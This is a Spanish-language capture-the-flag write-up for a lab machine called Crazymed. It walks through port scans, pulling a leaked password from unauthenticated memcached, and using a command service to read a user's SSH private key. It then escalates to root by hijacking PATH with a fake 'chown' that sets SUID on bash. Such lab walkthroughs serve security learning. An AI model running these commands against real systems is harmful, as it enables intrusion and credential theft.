Comenzamos enumerando puertos:
❯ sudo nmap -p- -sS --min-rate 5000 -n -Pn -oG 01-allPorts 192.168.1.22
❯ nmap -sCV -p22,80,4444,11211 -oN 02-targeted.txt 192.168.1.22
Starting Nmap 7.94 ( https://nmap.org ) at 2024-03-29 18:07 -03
Nmap scan report for 192.168.1.22
Host is up (0.00048s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey:
| 3072 db:fb:b1:fe:03:9c:17:36:83:ac:6b:c0:52:ad:a0:05 (RSA)
| 256 56:3b:7c:e3:23:4a:25:5a:be:54:d1:2e:9d:44:9a:06 (ECDSA)
|_ 256 81:d4:2e:47:33:34:a9:6f:10:70:c1:90:80:aa:b6:6a (ED25519)
80/tcp open http Apache httpd 2.4.54 ((Debian))
|_http-server-header: Apache/2.4.54 (Debian)
|_http-title: Crazymed Bootstrap Template - Index
4444/tcp open krb524?
...
| tests are performed on human volunteers for a fee.
| Password:
| [1;31mAccess denied.
...
11211/tcp open memcached Memcached 1.6.9 (uptime 232 seconds)
...
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 163.75 secondsExtraemos los datos de memcached (sin autenticación) con Metasploit, encontrando una contraseña:
msf6 auxiliary(gather/memcached_extractor) > exploit
[+] 192.168.1.22:11211 - Found 4 keys
Keys/Values Found for 192.168.1.22:11211
========================================
Key Value
--- -----
conf_location "VALUE conf_location 0 21\r\n/etc/memecacched.conf\r\nEND\r\n"
domain "VALUE domain 0 8\r\ncrazymed\r\nEND\r\n"
log "VALUE log 0 18\r\npassword: cr4zyM3d\r\nEND\r\n"
server "VALUE server 0 9\r\n127.0.0.1\r\nEND\r\n"El servicio del puerto 4444 pide esa contraseña y, una vez dentro, permite ejecutar comandos:
❯ nc 192.168.1.22 4444
Welcome to the Crazymed medical research laboratory.
All our tests are performed on human volunteers for a fee.
Password: cr4zyM3d
Access granted.
Type "?" for help.
System command:Lo usamos para volcar la id_rsa del usuario brad:
System command: id
uid=1000(brad) gid=1000(brad) groups=1000(brad),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),112(bluetooth)
System command: echo `cat /home/brad/.ssh/id_rsa`
-----BEGIN OPENSSH PRIVATE KEY----- b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn NhAAAAAwEAAQAAAYEA7RxztsvAPFz3TvDfW7xfFrsltczhiDcNYMkMVsyWTlXBQTb7CiDs ... -----END OPENSSH PRIVATE KEY-----Tras formatear la clave, nos conectamos por SSH y obtenemos la primera flag. En /opt hay un script que se ejecuta por cron:
brad@crazymed:/opt$ cat check_VM
#! /bin/bash
#users flags
flags=(/root/root.txt /home/brad/user.txt)
for x in "${flags[@]}"
do
if [[ ! -f $x ]] ; then
echo "$x doesn't exist"
mcookie > $x
chmod 700 $x
fi
done
chown -R www-data:www-data /var/www/html
#bash_history => /dev/null
home=$(cat /etc/passwd |grep bash |awk -F: '{print $6}')
for x in $home
do
ln -sf /dev/null $x/.bash_history ; eccho "All's fine !"
done
find /var/log -name "*.log*" -exec rm -f {} +El script invoca chown por su nombre relativo y /usr/local/bin es escribible, así que hacemos un PATH Hijacking: colocamos ahí un chown malicioso que da SUID a Bash:
brad@crazymed:/opt$ echo $PATH
/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games
brad@crazymed:/opt$ ls -la /usr/local/bin
total 8
drwxr-xrwx 2 root root 4096 Oct 31 2022 .
brad@crazymed:/opt$ echo "chmod u+s /bin/bash" > /usr/local/bin/chown; chmod +x /usr/local/bin/chown
brad@crazymed:/opt$ ls -l /bin/bash
-rwsr-xr-x 1 root root 1234376 Mar 27 2022 /bin/bashLanzamos bash -p y obtenemos nuestra flag.
Fin.